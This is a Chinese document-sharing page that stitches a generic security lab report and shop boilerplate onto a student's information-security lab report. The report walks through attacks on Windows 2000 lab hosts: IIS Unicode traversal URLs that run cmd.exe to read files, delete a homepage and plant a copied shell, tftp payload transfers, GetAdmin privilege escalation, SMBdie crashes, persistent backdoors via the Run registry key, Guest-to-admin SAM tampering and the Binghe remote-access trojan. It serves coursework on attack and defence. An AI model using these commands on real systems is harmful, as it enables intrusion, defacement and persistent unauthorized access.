通过本次实验,我也认识到信息安全是一个不断发展和演变的领域,我们必须不断学习和提升自己的技能,才能跟上信息安全的步伐。

在以后的学习和工作中,我将继续学习和关注信息安全领域的最新技术和发展动态,提高自己的信息安全意识和能力。

信息安全实验报告

信息安全实验报告

一、实验背景随着互联网的普及和信息技术的快速发展,信息安全问题日益凸显。

为了提高学生对信息安全知识的理解和实践能力,我们进行了本次信息安全实验。

通过实验,使学生了解信息安全的基本概念、技术手段和防范措施,增强学生的网络安全意识。

二、实验目的1. 了解信息安全的基本概念和常见的安全威胁;2. 掌握信息安全防护的基本技术;3. 培养学生的动手实践能力,提高学生的信息安全防护意识。

三、实验内容1. 信息安全基础知识(1)了解信息安全的基本概念,包括信息安全、保密性、完整性、可用性、可靠性等;(2)掌握信息安全的基本原则,如最小权限原则、最小化原则、完整性原则等;(3)了解信息安全面临的常见威胁,如恶意软件、网络攻击、信息泄露等。

2. 信息安全防护技术(1)学习并掌握密码学的基本原理和应用,如对称加密、非对称加密、哈希算法等;(2)了解防火墙、入侵检测系统、漏洞扫描等安全设备的工作原理和应用;(3)学习网络安全防护的基本技术,如VPN、SSH、SSL/TLS等。

3. 信息安全实验操作(1)使用工具对文件进行加密和解密,验证加密算法的安全性;(2)配置防火墙规则,实现网络访问控制;(3)使用入侵检测系统检测网络中的异常行为;(4)进行漏洞扫描,发现系统中的安全隐患。

四、实验步骤1. 安装实验环境(1)安装操作系统,如Windows、Linux等;(2)安装实验所需的软件,如加密工具、防火墙、入侵检测系统等。

2. 学习信息安全基础知识(1)阅读教材、资料,了解信息安全的基本概念、技术手段和防范措施;(2)观看相关视频教程,加深对信息安全知识的理解。

3. 信息安全实验操作(1)使用加密工具对文件进行加密和解密,验证加密算法的安全性;(2)配置防火墙规则,实现网络访问控制;(3)使用入侵检测系统检测网络中的异常行为;(4)进行漏洞扫描,发现系统中的安全隐患。

4. 实验报告撰写(1)整理实验过程中的问题和解决方案;(2)总结实验结果,对实验内容进行分析和评价;(3)撰写实验报告,包括实验目的、内容、步骤、结果、分析和结论等。

信息安全工程实践校内实践报告

信息安全工程实践校内实践报告

信息安全工程实践校内实践报告下载温馨提示:该文档是我店铺精心编制而成,希望大家下载以后,能够帮助大家解决实际的问题。

文档下载后可定制随意修改,请根据实际需要进行相应的调整和使用,谢谢!并且,本店铺为大家提供各种各样类型的实用资料,如教育随笔、日记赏析、句子摘抄、古诗大全、经典美文、话题作文、工作总结、词语解析、文案摘录、其他资料等等,如想了解不同资料格式和写法,敬请关注!Download tips: This document is carefully compiled by the editor. I hope that after you download them, they can help yousolve practical problems. The document can be customized and modified after downloading, please adjust and use it according to actual needs, thank you!In addition, our shop provides you with various types of practical materials, such as educational essays, diary appreciation, sentence excerpts, ancient poems, classic articles, topic composition, work summary, word parsing, copy excerpts,other materials and so on, want to know different data formats and writing methods, please pay attention!信息安全工程实践一直是当今社会亟需关注和研究的领域。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

信息安全工程实验报告学院:信息科学与工程学院班级:学号:姓名:目录实验一 (3)实验二 (7)实验三 (10)实验四 (13)实验六 (18)实验七 (24)实验八 (29)总结 (35)实验一一配置VM虚拟机1、先查看主机的ip地址为10.96.26.2052、将虚拟机的ip地址设置成和主机同一网段的3、在主机对虚拟机ping 测试两者是否连通经测试两者连通4、打开wireshark,设置过滤项源ip和目的ip :ip.dst==10.96.94.25&&ip.src==10.96.80.155设置只抓tcp下的ftp和telnet协议:tcp.port==21||tcp.port==23抓取udp和icmp:udp||icmp先ping虚拟机,然后开始抓包,ping完后,停止抓包,抓包数据如下二开启telnet服务1、分别在主机和虚拟机上开启telnet服务主机的telnet在服务选项开启在主机的DOS窗口下Telnet虚拟机192.168.31.128为虚拟机的地址2、输入服务器的用户名和密码,显示telnet虚拟机成功实验二一、系统用户的扫描1、对ip地址为169.254.168.201的计算机进行扫描2、得到对方机器的用户列表可选择一个用户对其进行字典测试或穷举测试,字典测试需选择一个字典文本,穷举测试可以设置穷举所包含的内容。

选择administrator进行字典测试,得到密码为111二、端口扫描使用工具Portscan对ip地址为10.96.94.25的主机进行扫描,得到目标主机的所有开放端口三、共享目录扫描通过工具软件Shed来扫描对方主机,得到对方计算机提供了哪些目录共享。

在这里起始ip和目标ip都添目标主机ip点击可共享文件夹客队目标主机内的文件进行操作四、利用tcp协议进行端口扫描实现端口扫描的程序可以使用TCP协议和UDP协议,原理是利用Socket连接对方的计算机的某端口,试图和该端口建立连接,如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,以下为探测ip为10.96.78.201的23号端口是否开放的结果实验三一漏洞扫描1、使用xscan对windows 2000进行扫描,设置扫描参数及模块,扫描ip为10.96.44.230的主机2、开始进行漏洞扫描二网络监听使用win sniffer可截取局域网内的密码,由于我的电脑不能运行win sniffer,下面我们来了解一下基本使用方法1、点击工具栏Adapter,设置为本机的物理网卡2、使用dos命令进行远程FTP服务3、win sniffer已经记录下了刚才会话记录三得到管理员密码环境:windows2000所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,将FindPass.exe拷贝到C盘根目录,在DOS界面下执行该程序,将得到当前用户得登录名四普通用户建立管理员账号环境:windows 2000利用工具GetAdmin.exe可以在用普通用户帐号登录后,将自己加到管理员组或者新建一个具有管理员权限的用户。

执行程序GetAdmin.exe,程序自动读取所有用户列表,点击按钮“New”,输入要新建的管理员组的用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,添加成功。

实验四一office文档暴力破解1、设置word权限密码在工具——选项——安全性中设置密码为999保存并关闭该文档,然后打开,就需要输入密码2、使用工具软件Advanced Office XP Password Recovery可以快速破解Word文档密码,点击工具栏按钮“Open File”,打开刚才建立的Word文档,程序打开成功后会在Log Window中显示成功打开的消息二利用Unicode漏洞对对方主机进行操作1、使用X-Scan对目标主机10.96.44.230进行IIS扫描,Unicode漏洞属于IIS漏洞可以看出,存在许多系统的漏洞。

只要是/scripts开头的漏洞都是Unicode漏洞。

2、在浏览器中输入有Unicode的主机ip %c0%2f”就是“/”的Unicode编码这条语句是执行dir命令列出目录结构。

结果可以看到ip地址为10.96.44.230下的目录结构3、用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件。

http://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\boot.ini4、更改对方主页,已经知道对方网站的根路径在“C:\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”(IIS默认启动页面)来删除主页http://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\d efault.asp5、将cmd.exe文件拷贝到scripts目录,并改名为c.exehttp://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\c md.exe+c.exe以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:http://10.96.44.230/scripts/c.exe?/c+dir+c:\实验五一利用Unicode漏洞入侵系统1、使用工具软件tftpd32.exe建立服务器。

将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序2、这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll 文件。

在浏览器中执行命令:http://10.96.44.230/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10.96.78.200+get+id q.dll传送成功3、下面使用工具软件ispc.exe入侵对方系统。

拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:ispc.exe 10.96.44.230/scripts/idq.dll连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限但是这一步存在问题,说它没有idq.dll,不知道是什么问题二其他漏洞攻击1、打印漏洞:利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。

使用工具软件cniis.exe对ip地址为10.96.44.230的主机进行操作cniis 10.96.44.230 00表示该操作系统未打补丁2、SMB致命攻击SMB(Session Message Block,会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。

利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。

下面介绍利用SMBdie让对方操作系统系统重新启动或者蓝屏。

(1)攻击时输入对方的IP和对方的计算机名(2)点击kill,对方计算机会蓝屏或重启实验六一远程启动Telnet服务1、分别在主机和虚拟机上开启telnet服务主机的telnet在服务选项开启在主机的DOS窗口下Telnet虚拟机192.168.31.128为虚拟机的地址2、输入服务器的用户名和密码,显示telnet虚拟机成功二记录管理员口令修改过程首先在对方操作系统中执行Win2KPass.exe文件,当对方主机管理员密码修改并重启计算机以后,就在Winnt\temp目录下产生一个ini文件。

该程序执行完后会自己删除自己。

三建立Web服务和Telnet服务1、使用工具软件wnc.exe开启两个服务Web服务和Telnet服务。

在对方的命令行下执行wnc.exe,执行完毕后,利用命令“netstat -an”来查看开启的808(Web服务)和707(Telnet 服务)端口2、测试Web服务在浏览器地址栏中输入“http://10.96.44.230:808”,出现主机的盘符列表3、利用“telnet 10.96.44.230 707”命令,不用任何的用户名和密码就可以登录对方主机4、将wnc.exe加到自启动列表(1)在dos下执行reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v service /d wnc.exe(2)查看一下对方的注册表的自启动项,已经被修改四让禁用的Guest具有管理权限直接使用“regedit”命令打开注册表,该键值是隐藏的。

可以利用工具软件psu.exe得到该键值的查看和编辑权1、使用进程管理器查看winlogon的PID为196,执行命令“psu -p regedit -i pid”其中pid 为Winlogon.exe的进程号2、执行完命令以后,自动打开了注册表编辑器,查看SAM下的键值3、在Windows 2000操作系统上,Administrator一般为0x1f4,guest一般为0x1f5 。

根据“0x1f4”和“0x1f5”找到Administrator和guest帐户的配置信息拷贝000001F4下的键值全部覆盖到“000001F5”目录下的“F”键值中4、Guest帐户已经具有管理员权限了。

为了能够使Guest帐户在禁用的状态登录,下一步将Guest帐户信息导出注册表。

选择User目录,然后选择菜单栏“注册表”下的菜单项“导出注册表文件”,将该键值保存为一个配置文件5、分别删除Guest和“00001F5”两个目录,刷新对方主机的用户列表,会出现用户找不到的对话框。

然后再将刚才导出的信息文件,再导入注册表。

再刷新用户列表就不在出现该对话框了。

再查看一下计算机管理窗口中的Guest帐户,发现该帐户是禁用的6、注销退出系统,然后用用户名:“guest”,密码:“123456”登录系统实验七一使用“冰河”进行远程控制1、在被控制端运行冰河服务器端程序将win32.exe传到被攻击主机,在DOS下运行该程序,执行完win32.exe文件以后,系统没有任何反应,其实已经更改了注册表,并将服务器端程序和文本文件进行了关联,当用户双击一个扩展名为txt的文件的时候,就会自动执行冰河服务器端程序2、在本机进行操作,在出现的对话框中选择服务器端程序win32.exe进行配置,并填写访问服务器端程序的口令,这里设置为“1234567890”。

相关文档
最新文档